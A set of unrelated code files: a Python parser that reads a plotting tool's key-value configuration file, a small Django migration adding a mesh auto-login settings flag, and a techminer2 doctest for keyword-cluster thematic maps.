debddbba4fed0e1eae042eedc1554094bb78a63d
|
[
"MIT"
] | null | null | null |
import logging
class readOptions(object):
# The class "constructor" - It's actually an initializer
def __init__(self, filename):
#Gerais
self.plot_image_type = 'maps'
self.plot_type = 1
self.title = ''
self.CompressImage = None
self.Xmin = None
self.Ymin = None
self.Xmax = None
self.Ymax = None
self.fontsize = 6
self.logopath = None
self.dpi = 200
self.figureOutName = None
self.AQUASAFE = 0
#MAPS
self.filePath = None
self.filePathB = None
self.scalar = None
self.scalarMax = None
self.scalarMin = None
self.layerDepth = 'surface'
self.vectorX = None
self.vectorY = None
self.stream = 0
self.streamX = None
self.streamY = None
self.stream_arrow_factor = 5
self.stream_color = None
self.stream_density = 0.5
self.stream_linewidth= 1.5
self.vectorStep = 1
self.vectorSize = None
self.vectorWidth = 0.002
self.legend = None
self.gssh = 0
self.worldImage = 0
self.worldImage_esri= 'World_Imagery'
self.colorbar = 1
self.colormap = 'jet'
self.colorbarSpacing= 1
self.timeZone = 'UTC'
self.dt = 1
self.filename = filename
self.fillValue = None
self.fillContinents = 0
self.fillContinents_color = 'w'
self.window = None
self.dx = None
self.dy = None
self.resolution = 'i'
self.coastline = 0
self.X = 0
self.Y = 0
self.points = 0
self.label = 1
self.orientationcolorbar = 'vertical'
self.logoPath = None
self.decimalcolorbar = None
self.drawBathymetry = 0
self.extend = None
self.figuretransparent = 0
self.constantvector = 0
self.vectorcolor = 'k'
self.figurecolor = 'w'
self.xpixel = None
self.ypixel = None
self.figurequality = 100
self.quiverunits = 'width'
self.justvector = 0
self.polygon = 0
self.polygonfill = 0
self.polygoncolor = 'k'
self.pcolor = 0
self.LogMap = 0
self.conversionfactor = None
self.colorpoints = 'r'
self.fontsizepoints = 15
self.dynamic_limits = 0
self.hdf5valida_config = []
self.maps_validation_parameters = []
self.timeseries_validation_parameters = []
self.run_valida = 1
self.Xinches = None
self.Yinches = None
self.validation_grid = [1,1]
self.validation_grid_ws = 0.3
self.validation_grid_hs = 0.1
self.plot_bias = 0
self.plot_rmse = 0
self.plot_rcorr = 0
#TimeSeries
self.linewidth = 1
self.xlabel = None
self.ylabel = None
self.parameter = ''
self.Ymax = None
self.Ymin = None
self.files_list = []
self.files_list_column = []
self.files_list_name = []
self.files_list_type = []
self.files_list_color = []
self.offset = []
self.timeserieanalyser_config = []
self.executable_exe = None
self.stdev_obs =None
self.average_obs =None
self.bias =None
self.rmse =None
self.normalise_rmse =None
self.unbias_rmse =None
self.normalise_unbias_rmse =None
self.rcorr =None
self.nash_sutcliffe =None
self.skill =None
self.rcorr_quad =None
self.z_fisher =None
self.alfa =None
self.beta_1 =None
self.am =None
self.bm =None
self.basemap_config = None
readOptions.__scanOptions(self)
def __scanOptions(self):
import re
import os
import logging
import sys
try:
fid = open(self.filename, 'r',encoding='utf-8')
except IOError:
logging.info(': Modulo General Read Options : Error 001 : Cannot open ' + self.filename)
try:
for line in fid:
auxString=line
string=auxString.strip()
stringSplit=re.split(':',string,1)
if stringSplit[0].strip().lower() == 'PLOT_IMAGE_TYPE'.lower():
string=stringSplit[1].strip()
mylist=string.split(' ')
self.plot_image_type=(mylist[0])
elif stringSplit[0].strip().lower() == 'PLOT_TYPE'.lower():
string=stringSplit[1].strip()
mylist=string.split('#')
self.plot_type= int(mylist[0])
elif stringSplit[0].strip().lower() == 'FIGURE_OUT_NAME'.lower():
self.figureOutName=stringSplit[1].strip()
if not self.figureOutName:
raise ValueError('Empty String!')
elif stringSplit[0].strip().lower() == 'DPI'.lower():
self.dpi=int (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'LOGO_PATH'.lower():
self.logoPath=stringSplit[1].strip()
if not self.logoPath:
raise ValueError('Empty String!')
elif stringSplit[0].strip().lower() == 'FONTSIZE'.lower():
self.fontsize= float(stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'COMPRESSIMAGE'.lower():
self.CompressImage=int (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'TITLE'.lower():
self.title=stringSplit[1].strip()
if not self.title:
raise ValueError('Empty String!')
elif stringSplit[0].strip().lower() == 'FILE_PATH'.lower():
self.filePath=stringSplit[1].split(',')
if not self.filePath:
raise ValueError('Empty String!')
#if self.plot_image_type == 'maps' and self.plot_type == 2:
# self.filePathB=self.filePath[1].strip()
# self.filePath=self.filePath[0].strip()
#else:
self.filePath=self.filePath[0].strip()
elif stringSplit[0].strip().lower() == 'AQUASAFE'.lower():
self.AQUASAFE=int (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'SCALAR'.lower():
self.scalar=stringSplit[1].strip()
if not self.scalar:
raise ValueError('Empty String!')
elif stringSplit[0].strip().lower() == 'SCALAR_MAX'.lower():
self.scalarMax= float(stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'SCALAR_MIN'.lower():
self.scalarMin= float(stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'VECTOR_X'.lower():
self.vectorX=stringSplit[1].strip()
if not self.vectorX:
raise ValueError('Empty String!')
elif stringSplit[0].strip().lower() == 'VECTOR_Y'.lower():
self.vectorY=stringSplit[1].strip()
if not self.vectorY:
raise ValueError('Empty String!')
elif stringSplit[0].strip().lower() == 'STREAMPLOT'.lower():
self.stream=int (stringSplit[1].strip())
if not self.stream:
raise ValueError('Empty String!')
elif stringSplit[0].strip().lower() == 'STREAMPLOT_DENSITY'.lower():
self.stream_density=float (stringSplit[1].strip())
#if self.stream_density > 4:
# raise ValueError('Reduce Stream Density, values must be bellow or equal to 4!') # se for maior ele gera matriz de 30*densidade
elif stringSplit[0].strip().lower() == 'STREAMPLOT_LINEWIDTH'.lower():
self.stream_linewidth=float (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'STREAMPLOT_ARROW_FACTOR'.lower():
self.stream_arrow_factor=float (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'STREAMPLOT_X'.lower():
self.streamX=stringSplit[1].strip()
if not self.streamX:
raise ValueError('Empty String!')
elif stringSplit[0].strip().lower() == 'STREAMPLOT_Y'.lower():
self.streamY=stringSplit[1].strip()
if not self.streamY:
raise ValueError('Empty String!')
elif stringSplit[0].strip().lower() == 'STREAMPLOT_COLOR'.lower():
self.stream_color = stringSplit[1].strip()
if self.stream_color.startswith("["):
aux = tuple(self.stream_color[1:int(len(self.stream_color))-1].split(','))
self.stream_color=float(aux[0]),float(aux[1]),float(aux[2])
elif stringSplit[0].strip().lower() == 'VECTOR_STEP'.lower():
self.vectorStep=int (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'VECTOR_SIZE'.lower():
self.vectorSize=int (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'VECTOR_WIDTH'.lower():
self.vectorWidth=float (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'LEGEND'.lower():
self.legend=stringSplit[1].strip()
if not self.legend:
raise ValueError('Empty String!')
elif stringSplit[0].strip().lower() == 'GSSH'.lower():
self.gssh=int (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'WORLD_IMAGE'.lower():
self.worldImage=int (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'WORLD_IMAGE_ESRI'.lower():
self.worldImage_esri=stringSplit[1].strip().split()[0]
if not self.worldImage_esri:
raise ValueError('Empty String!')
elif stringSplit[0].strip().lower() == 'COLORBAR'.lower():
self.colorbar=int (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'DYNAMIC_LIMITS'.lower():
self.dynamic_limits=int (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'COLORMAP'.lower():
stringcolormap = stringSplit[1].strip()
if stringcolormap.startswith("["):
auxColormap = stringcolormap[1:int(len(stringcolormap))-1].split(';')
self.colormap= [None]*(len(auxColormap));
i=0
for x in auxColormap:
temp=x.split(',')
self.colormap[i] = [float(temp[0]),float(temp[1]),float(temp[2])]
i=i+1
else:
self.colormap = stringSplit[1].strip()
elif stringSplit[0].strip().lower() == 'TIMEZONE'.lower():
self.timeZone=stringSplit[1].strip()
if not self.timeZone:
raise ValueError('Empty String!')
elif stringSplit[0].strip().lower() == 'DT'.lower():
self.dt=int (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'XINCHES'.lower():
self.Xinches=float (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'YINCHES'.lower():
self.Yinches=float (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'LAYER_DEPTH'.lower():
if not stringSplit[1].strip():
raise ValueError('Empty String!')
elif stringSplit[1].strip().lower() == 'SURFACE'.lower():
self.layerDepth=stringSplit[1].strip().lower()
else:
self.layerDepth=int (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'FILL_VALUE'.lower():
auxFields=re.split(r' +',stringSplit[1].strip())
self.fillValue=[float(i) for i in auxFields]
elif stringSplit[0].strip().lower() == 'COLORBAR_SPACING'.lower():
self.colorbarSpacing=float (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'FILL_CONTINENTS'.lower():
self.fillContinents=int (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'RUN_VALIDA'.lower():
self.run_valida=int (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'DX'.lower():
self.dx=float (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'DY'.lower():
self.dy=float (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'GSSH_RESOLUTION'.lower():
self.resolution=stringSplit[1].strip()
elif stringSplit[0].strip().lower() == 'WINDOW'.lower():
stringSplit=re.split(':',string,1)
self.Xmin=float (re.split(' ',stringSplit[1].strip(),0)[0])
self.Ymin=float (re.split(' ',stringSplit[1].strip(),0)[1])
self.Xmax=float (re.split(' ',stringSplit[1].strip(),0)[2])
self.Ymax=float (re.split(' ',stringSplit[1].strip(),0)[3])
elif stringSplit[0].strip().lower() == 'COASTLINE'.lower():
coastlineFile=stringSplit[1].strip()
if not coastlineFile:
raise ValueError('Coastline Empty String!')
try:
self.coastline = 1
fid = open(coastlineFile, 'r',encoding='utf-8')
self.X,self.Y = [], []
for line in fid:
self.X.append(float (re.split(' ',line.strip(),0)[0]))
self.Y.append(float (re.split(' ',line.strip(),0)[1]))
except ValueError as ex:
fid.close()
logging.info(': Modulo General Read Options : Error 002 : No Coastline Path ' + stringSplit[0].strip().lower())
logging.shutdown()
sys.exit()
elif stringSplit[0].strip().lower() == 'POINTS'.lower():
pointsFile=stringSplit[1].strip()
if not pointsFile:
raise ValueError('Points Empty String!')
try:
self.points = 1
fid = open(pointsFile, 'r',encoding='utf-8')
self.NamePoints,self.XPoints,self.YPoints = [], [], []
for line in fid:
self.NamePoints.append(re.split(' ',line.strip(),0)[0])
self.XPoints.append(float (re.split(' ',line.strip(),0)[1]))
self.YPoints.append(float (re.split(' ',line.strip(),0)[2]))
except ValueError as ex:
fid.close()
logging.info(': Modulo General Read Options : Error 003 : No Points Path ' + stringSplit[0].strip().lower())
logging.shutdown()
sys.exit()
elif stringSplit[0].strip().lower() == 'LABEL'.lower():
self.label=int (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'ORIENTATIONCOLORBAR'.lower():
self.orientationcolorbar=stringSplit[1].strip()
if not self.orientationcolorbar:
raise ValueError('Empty String!')
elif stringSplit[0].strip().lower() == 'JUST_VECTOR'.lower():
self.justvector= int(stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'DECIMALCOLORBAR'.lower():
self.decimalcolorbar=int (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'DRAW_BATHYMETRY'.lower():
self.drawBathymetry=int (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'EXTEND'.lower():
self.extend =stringSplit[1].strip()
elif stringSplit[0].strip().lower() == 'FIGURE_TRANSPARENT'.lower():
self.figuretransparent =int (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'CONSTANT_VECTOR'.lower():
self.constantvector =int (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'VECTOR_COLOR'.lower():
self.vectorcolor = stringSplit[1].strip()
if self.vectorcolor.startswith("["):
aux = tuple(self.vectorcolor[1:int(len(self.vectorcolor))-1].split(','))
self.vectorcolor=float(aux[0]),float(aux[1]),float(aux[2])
elif stringSplit[0].strip().lower() == 'FIGURE_COLOR'.lower():
self.figurecolor = stringSplit[1].strip()
if self.figurecolor.startswith("["):
aux = tuple(self.figurecolor[1:int(len(self.figurecolor))-1].split(','))
self.figurecolor=float(aux[0]),float(aux[1]),float(aux[2])
elif stringSplit[0].strip().lower() == 'FILL_CONTINENTE_COLOR'.lower():
self.fillContinents_color = stringSplit[1].strip()
if self.fillContinents_color.startswith("["):
aux = tuple(self.fillContinents_color[1:int(len(self.fillContinents_color))-1].split(','))
self.fillContinents_color=float(aux[0]),float(aux[1]),float(aux[2])
elif stringSplit[0].strip().lower() == 'X_PIXEL'.lower():
self.xpixel =int (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'Y_PIXEL'.lower():
self.ypixel =int (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'FIGURE_QUALITY'.lower():
self.figurequality =int (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'QUIVER_UNITS'.lower():
self.quiverunits = (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'POLYGON_FILE'.lower():
polygonFile=stringSplit[1].strip()
if not polygonFile:
raise ValueError('Polygon file Empty String!')
try:
self.polygon = 1
fid = open(polygonFile, 'r',encoding='utf-8')
self.polyX,self.polyY = [], []
for line in fid:
self.polyX.append(float (re.split(' ',line.strip(),0)[0]))
self.polyY.append(float (re.split(' ',line.strip(),0)[1]))
except ValueError as ex:
fid.close()
logging.info(': Modulo General Read Options : Error 004 : No polygon file Path ' + stringSplit[0].strip().lower())
logging.shutdown()
sys.exit()
elif stringSplit[0].strip().lower() == 'POLYGON_COLOR'.lower():
self.polygoncolor = stringSplit[1].strip()
if self.polygoncolor.startswith("["):
aux = tuple(self.polygoncolor[1:int(len(self.polygoncolor))-1].split(','))
self.polygoncolor=float(aux[0]),float(aux[1]),float(aux[2])
elif stringSplit[0].strip().lower() == 'POLYGON_FILL'.lower():
self.polygonfill=int (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'PCOLOR'.lower():
self.pcolor =int (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'LOG_MAP'.lower():
self.LogMap =int (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'LOG_MAP_LEVELS'.lower():
AuxLogMapLevels = stringSplit[1].strip().split(',')
self.LogMapLevels = [float(i) for i in AuxLogMapLevels]
elif stringSplit[0].strip().lower() == 'CONVERSION_FACTOR'.lower():
self.conversionfactor =float(stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'POINTS_COLOR'.lower():
self.pointscolor = stringSplit[1].strip()
if self.pointscolor.startswith("["):
aux = tuple(self.pointscolor[1:int(len(self.pointscolor))-1].split(','))
self.pointscolor=float(aux[0]),float(aux[1]),float(aux[2])
elif stringSplit[0].strip().lower() == 'FONTSIZE_POINTS'.lower():
self.fontsizepoints= float(stringSplit[1].strip())
elif stringSplit[0].strip().lower() == '<BEGIN_VALIDATION_PARAMETERS_MAPS>'.lower():
try:
for line in fid:
auxString=line
mylist=auxString.split(',')
if line.strip().lower() == '<END_VALIDATION_PARAMETERS_MAPS>'.lower():
break
else :
if int(mylist[1]) == 0:
continue
else:
self.maps_validation_parameters.append(mylist)
except:
logging.info(': Modulo General Read Options : Error 006 : failed to read validation maps request')
elif stringSplit[0].strip().lower() == '<BEGIN_VALIDATION_PARAMETERS_TS>'.lower():
try:
for line in fid:
auxString=line
mylist=auxString.split(',')
if line.strip().lower() == '<END_VALIDATION_PARAMETERS_TS>'.lower():
break
else :
if int(mylist[1]) == 0:
continue
else:
self.timeseries_validation_parameters.append(mylist)
except:
logging.info(': Modulo General Read Options : Error 007 : failed to read validation maps request')
elif stringSplit[0].strip().lower() == 'VALIDATION_GRID'.lower():
string=stringSplit[1].strip()
mylist=string.split(',')
_A= mylist[0]
_B= mylist[1]
self.validation_grid= [int(_A),int(_B)]
elif stringSplit[0].strip().lower() == 'PLOT_BIAS'.lower():
try:
string=stringSplit[1].strip()
mylist=string.split(',')
self.plot_bias = mylist
#self.plot_bias.ymin = int(mylist[1])
#self.plot_bias.ymax = int(mylist[2])
#self.plot_bias.eixo = int(mylist[3])
#self.plot_bias.title = mylist[4]
except ValueError as ex:
logging.info(': Modulo General Read Options : Error 008 : failed to process ' + stringSplit[0].strip().lower())
logging.shutdown()
sys.exit()
elif stringSplit[0].strip().lower() == 'PLOT_RMSE'.lower():
try:
string=stringSplit[1].strip()
mylist=string.split(',')
self.plot_rmse = mylist
#self.plot_bias.ymin = int(mylist[1])
#self.plot_bias.ymax = int(mylist[2])
#self.plot_bias.eixo = int(mylist[3])
#self.plot_bias.title = mylist[4]
except ValueError as ex:
logging.info(': Modulo General Read Options : Error 009 : failed to process ' + stringSplit[0].strip().lower())
logging.shutdown()
sys.exit()
elif stringSplit[0].strip().lower() == 'PLOT_RCORR'.lower():
try:
string=stringSplit[1].strip()
mylist=string.split(',')
self.plot_rcorr = mylist
#self.plot_bias.ymin = int(mylist[1])
#self.plot_bias.ymax = int(mylist[2])
#self.plot_bias.eixo = int(mylist[3])
#self.plot_bias.title = mylist[4]
except ValueError as ex:
logging.info(': Modulo General Read Options : Error 010 : failed to process ' + stringSplit[0].strip().lower())
logging.shutdown()
sys.exit()
elif stringSplit[0].strip().lower() == 'LINEWIDTH'.lower():
self.linewidth=stringSplit[1].strip()
if not self.linewidth:
raise ValueError('Empty String!')
elif stringSplit[0].strip().lower() == 'PARAMETER'.lower():
self.parameter=stringSplit[1].strip()
if not self.parameter:
raise ValueError('Empty String!')
elif stringSplit[0].strip().lower() == 'XLABEL'.lower():
self.xlabel=stringSplit[1].strip()
if not self.xlabel:
raise ValueError('Empty String!')
elif stringSplit[0].strip().lower() == 'YLABEL'.lower():
self.ylabel=stringSplit[1].strip()
if not self.ylabel:
raise ValueError('Empty String!')
elif stringSplit[0].strip().lower() == 'FIGURE_COLOR'.lower():
try:
self.figurecolor = stringSplit[1].strip()
if self.figurecolor.startswith("["):
aux = tuple(self.figurecolor[1:int(len(self.figurecolor))-1].split(','))
self.figurecolor=float(aux[0]),float(aux[1]),float(aux[2])
logging.info(': Sucess 001 : Figure Color readed ')
except:
logging.info(': Modulo General Read Options : Error 011 : Figure color readed failed ')
elif stringSplit[0].strip().lower() == 'YMAX'.lower():
try:
self.Ymax=float (stringSplit[1].strip())
logging.info(': Sucess 001 : Ymax readed ')
except:
logging.info(': Modulo General Read Options : Error 012 : Ymax readed failed ')
elif stringSplit[0].strip().lower() == 'YMIN'.lower():
try:
self.Ymin=float (stringSplit[1].strip())
logging.info(': Sucess 001 : Ymin readed ')
except:
logging.info(': Modulo General Read Options : Error 013 : Ymin readed failed ')
elif stringSplit[0].strip().lower() == 'X_PIXEL'.lower():
try:
self.xpixel =int (stringSplit[1].strip())
logging.info(': Sucess 001 : dimensao X readed ')
except:
logging.info(': Modulo General Read Options : Error 014 : dimensao X readed failed ')
elif stringSplit[0].strip().lower() == 'Y_PIXEL'.lower():
try:
self.ypixel =int (stringSplit[1].strip())
logging.info(': Sucess 001 : dimensao Y readed ')
except:
logging.info(': Modulo General Read Options : Error 015 : dimensao Y readed failed ')
elif stringSplit[0].strip().lower() == '<BEGIN_FILES_LIST>'.lower():
try:
for line in fid:
auxString=line
string=auxString.strip()
if line.strip().lower() == '<END_FILES_LIST>'.lower():
break
else :
auxValues=re.split(' +',string.strip())
self.files_list.append(string)
logging.info(': Sucess 001 : lista de ficheiros readed ')
except:
logging.info(': Modulo General Read Options : Error 016 : lista de ficheiros failed ')
elif stringSplit[0].strip().lower() == '<BEGIN_FILES_LIST_COLUMN>'.lower():
try:
for line in fid:
auxString=line
string=auxString.strip()
if line.strip().lower() == '<END_FILES_LIST_COLUMN>'.lower():
break
else :
auxValues=re.split(' +',string.strip())
self.files_list_column.append(int(string))
logging.info(': Sucess 001 : lista de coluna de ficheiros readed ')
except:
logging.info(': Modulo General Read Options : Error 017 : lista de coluna de ficheiros failed ')
elif stringSplit[0].strip().lower() == '<BEGIN_FILES_LIST_NAME>'.lower():
try:
for line in fid:
auxString=line
string=auxString.strip()
if line.strip().lower() == '<END_FILES_LIST_NAME>'.lower():
break
else :
auxValues=re.split(' +',string.strip())
self.files_list_name.append(string)
logging.info(': Sucess 001 : lista de nomes dos ficheiros readed ')
except:
logging.info(': Modulo General Read Options : Error 018 : lista de nomes dos ficheiros failed ')
elif stringSplit[0].strip().lower() == '<BEGIN_FILES_OFFSET>'.lower():
try:
for line in fid:
auxString=line
string=auxString.strip()
if line.strip().lower() == '<END_FILES_OFFSET>'.lower():
break
else :
auxValues=re.split(' +',string.strip())
self.offset.append(float(string))
logging.info(': Sucess 001 : lista de offsets readed ')
except:
logging.info(': Modulo General Read Options : Error 019 : lista de offsets failed ')
elif stringSplit[0].strip().lower() == '<BEGIN_TimeSeriesAnalyser>'.lower():
try:
for line in fid:
auxString = line
if line.strip().lower() == '<END_TimeSeriesAnalyser>'.lower():
break
else :
self.timeserieanalyser_config.append(auxString)
logging.info(': Sucess 001 : configuracoes timeseriesanalyser readed ')
except:
logging.info(': Modulo General Read Options : Error 020 : configuracoes timeseranalyser ')
elif stringSplit[0].strip().lower() == '<BEGIN_hdf5nalyser>'.lower():
try:
for line in fid:
auxString = line
if line.strip().lower() == '<end_hdf5nalyser>'.lower():
break
else :
self.hdf5valida_config.append(auxString)
logging.info(': Sucess 001 : configuracoes timeseriesanalyser readed ')
except:
logging.info(': Modulo General Read Options : Error 020 : configuracoes timeseranalyser ')
elif stringSplit[0].strip().lower() == '<BEGIN_FILES_COLOR>'.lower():
try:
for line in fid:
auxString=line
string=auxString.strip()
if line.strip().lower() == '<END_FILES_COLOR>'.lower():
break
else :
auxValues=re.split(' +',string.strip())
self.files_list_color.append(string)
logging.info(': Sucess 001 : lista de nomes dos ficheiros readed ')
except:
logging.info(': Modulo General Read Options : Error 000 : Lista de cores das Séries temporais ')
elif stringSplit[0].strip().lower() == '<BEGIN_FILES_TYPE>'.lower():
try:
for line in fid:
auxString=line
string=auxString.strip()
if line.strip().lower() == '<END_FILES_TYPE>'.lower():
break
else :
auxValues=re.split(' +',string.strip())
self.files_list_type.append(string)
logging.info(': Sucess 001 : lista de nomes dos ficheiros readed ')
except:
logging.info(': Modulo General Read Options : Error 018 : lista de tipos de timeseries simbolos ')
elif stringSplit[0].strip().lower() == 'EXECUTABLE_PATH'.lower():
try:
self.executable_exe=stringSplit[1].strip()
logging.info(': Sucess 001 : caminho para o executavel encontrado ')
if not self.logoPath:
raise ValueError('Empty String!')
except:
logging.info(': Modulo General Read Options : Error 021 : Caminho para o executavel nao encontrado')
elif stringSplit[0].strip().lower() == 'STDEV_OBS'.lower():
try:
self.stdev_obs=float (stringSplit[1].strip())
logging.info(': Sucess 001 : Apresentar STDEV_OBS ')
except:
logging.info(': Modulo General Read Options : Error 022 : Não consegui ler a opção 0/1 em STDEV_OBS ')
elif stringSplit[0].strip().lower() == 'AVERAGE_OBS'.lower():
try:
self.average_obs=float (stringSplit[1].strip())
logging.info(': Sucess 001 : Apresentar AVERAGE_OBS ')
except:
logging.info(': Modulo General Read Options : Error 023 : Não consegui ler a opção 0/1 em AVERAGE_OBS ')
elif stringSplit[0].strip().lower() == 'BIAS'.lower():
try:
self.bias=float (stringSplit[1].strip())
logging.info(': Sucess 001 : Apresentar BIAS ')
except:
logging.info(': Modulo General Read Options : Error 024 : Não consegui ler a opção 0/1 em BIAS ')
elif stringSplit[0].strip().lower() == 'RMSE'.lower():
try:
self.rmse=float (stringSplit[1].strip())
logging.info(': Sucess 001 : Apresentar RMSE ')
except:
logging.info(': Modulo General Read Options : Error 025 : Não consegui ler a opção 0/1 em RMSE ')
elif stringSplit[0].strip().lower() == 'NORMALISE_RMSE'.lower():
try:
self.normalise_rmse=float (stringSplit[1].strip())
logging.info(': Sucess 001 : Apresentar Normalise RMSE [%] ')
except:
logging.info(': Modulo General Read Options : Error 026 : Não consegui ler a opção 0/1 em Normalise RMSE [%] ')
elif stringSplit[0].strip().lower() == 'UNBIAS_RMSE'.lower():
try:
self.unbias_rmse=float (stringSplit[1].strip())
logging.info(': Sucess 001 : Apresentar Unbias RMSE ')
except:
logging.info(': Modulo General Read Options : Error 027 : Não consegui ler a opção 0/1 em Unbias RMSE ')
elif stringSplit[0].strip().lower() == 'NORMALISE_UNBIAS_RMSE'.lower():
try:
self.normalise_unbias_rmse=float (stringSplit[1].strip())
logging.info(': Sucess 001 : Apresentar Normalise unbias RMSE[%] ')
except:
logging.info(': Modulo General Read Options : Error 028 : Não consegui ler a opção 0/1 em Normalise unbias RMSE[%] ')
elif stringSplit[0].strip().lower() == 'RCORR'.lower():
try:
self.rcorr=float (stringSplit[1].strip())
logging.info(': Sucess 001 : Apresentar rcorr ')
except:
logging.info(': Modulo General Read Options : Error 029 : Não consegui ler a opção 0/1 em rcorr ')
elif stringSplit[0].strip().lower() == 'NASH_SUTCLIFFE'.lower():
try:
self.nash_sutcliffe=float (stringSplit[1].strip())
logging.info(': Sucess 001 : Apresentar NASH–SUTCLIFFE ')
except:
logging.info(': Modulo General Read Options : Error 030 : Não consegui ler a opção 0/1 em NASH–SUTCLIFFE ')
elif stringSplit[0].strip().lower() == 'SKILL'.lower():
try:
self.skill=float (stringSplit[1].strip())
logging.info(': Sucess 001 : Apresentar SKILL ')
except:
logging.info(': Modulo General Read Options : Error 031 : Não consegui ler a opção 0/1 em SKILL ')
elif stringSplit[0].strip().lower() == 'RCORR_QUAD'.lower():
try:
self.rcorr_quad=float (stringSplit[1].strip())
logging.info(': Sucess 001 : Apresentar rcorr_quad ')
except:
logging.info(': Modulo General Read Options : Error 032 : Não consegui ler a opção 0/1 em rcorr_quad ')
elif stringSplit[0].strip().lower() == 'Z_FISHER'.lower():
try:
self.z_fisher=float (stringSplit[1].strip())
logging.info(': Sucess 001 : Apresentar z_fisher ')
except:
logging.info(': Modulo General Read Options : Error 033 : Não consegui ler a opção 0/1 em z_fisher ')
elif stringSplit[0].strip().lower() == 'ALFA'.lower():
try:
self.alfa=float (stringSplit[1].strip())
logging.info(': Sucess 001 : Apresentar alfa ')
except:
logging.info(': Modulo General Read Options : Error 034 : Não consegui ler a opção 0/1 em alfa ')
elif stringSplit[0].strip().lower() == 'BETA_1'.lower():
try:
self.beta_1=float (stringSplit[1].strip())
logging.info(': Sucess 001 : Apresentar beta_1 ')
except:
logging.info(': Modulo General Read Options : Error 035 : Não consegui ler a opção 0/1 em beta_1 ')
elif stringSplit[0].strip().lower() == 'AM'.lower():
try:
self.am=float (stringSplit[1].strip())
logging.info(': Sucess 001 : Apresentar Am ')
except:
logging.info(': Modulo General Read Options : Error 036 : Não consegui ler a opção 0/1 em Am ')
elif stringSplit[0].strip().lower() == 'BM'.lower():
try:
self.bm=float (stringSplit[1].strip())
logging.info(': Sucess 001 : Apresentar Bm ')
except:
logging.info(': Modulo General Read Options : Error 037 : Não consegui ler a opção 0/1 em Bm ')
elif stringSplit[0].strip().lower() == 'VALIDATION_GRID_WS'.lower():
self.validation_grid_ws= float(stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'VALIDATION_GRID_HS'.lower():
self.validation_grid_hs= float(stringSplit[1].strip())
except ValueError as ex:
fid.close()
logging.info(': Modulo General Read Options : Error 038 : No value for ' + stringSplit[0].strip().lower())
logging.shutdown()
sys.exit()
fid.close()
def readoptions(filename):
logging.info(': Reading Configuration File')
options = readOptions(filename)
logging.info(': Finished reading Configuration File')
return options
| 50.625698
| 174
| 0.454271
|
4a18973d24465418c7eba8b7ea12522654838819
| 439
|
py
|
Python
|
api/tacticalrmm/core/migrations/0033_coresettings_mesh_disable_auto_login.py
|
v2cloud/tacticalrmm
|
12f599f9749985f66ff9b559c5e5abd36064b182
|
[
"MIT"
] | null | null | null |
api/tacticalrmm/core/migrations/0033_coresettings_mesh_disable_auto_login.py
|
v2cloud/tacticalrmm
|
12f599f9749985f66ff9b559c5e5abd36064b182
|
[
"MIT"
] | null | null | null |
api/tacticalrmm/core/migrations/0033_coresettings_mesh_disable_auto_login.py
|
v2cloud/tacticalrmm
|
12f599f9749985f66ff9b559c5e5abd36064b182
|
[
"MIT"
] | null | null | null |
# Generated by Django 4.0.3 on 2022-04-12 18:59
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('core', '0032_alter_coresettings_email_alert_recipients_and_more'),
]
operations = [
migrations.AddField(
model_name='coresettings',
name='mesh_disable_auto_login',
field=models.BooleanField(default=False),
),
]
| 23.105263
| 76
| 0.646925
|
4a18977a9dbb5b6d81e5a517facc9cdb3331e7d3
| 1,243
|
py
|
Python
|
techminer2/thematic_map_communities.py
|
jdvelasq/techminer-api
|
d2bb7d20c326f2fe7cc06d7005dfb3f2053ea1da
|
[
"MIT"
] | null | null | null |
techminer2/thematic_map_communities.py
|
jdvelasq/techminer-api
|
d2bb7d20c326f2fe7cc06d7005dfb3f2053ea1da
|
[
"MIT"
] | null | null | null |
techminer2/thematic_map_communities.py
|
jdvelasq/techminer-api
|
d2bb7d20c326f2fe7cc06d7005dfb3f2053ea1da
|
[
"MIT"
] | null | null | null |
"""
Thematic Map / Communities
===============================================================================
>>> from techminer2 import *
>>> directory = "/workspaces/techminer2/data/"
>>> thematic_map_communities(
... 'author_keywords',
... min_occ=4,
... directory=directory,
... ).head()
cluster CLUST_0 ... CLUST_4
rn ...
0 fintech 139:1285 ... block-chain 017:0149
1 innovating 013:0249 ... cryptocurrencies 008:0036
2 bank 012:0185 ... smart contract 004:0018
3 regulating 011:0084 ... bitcoin 003:0007
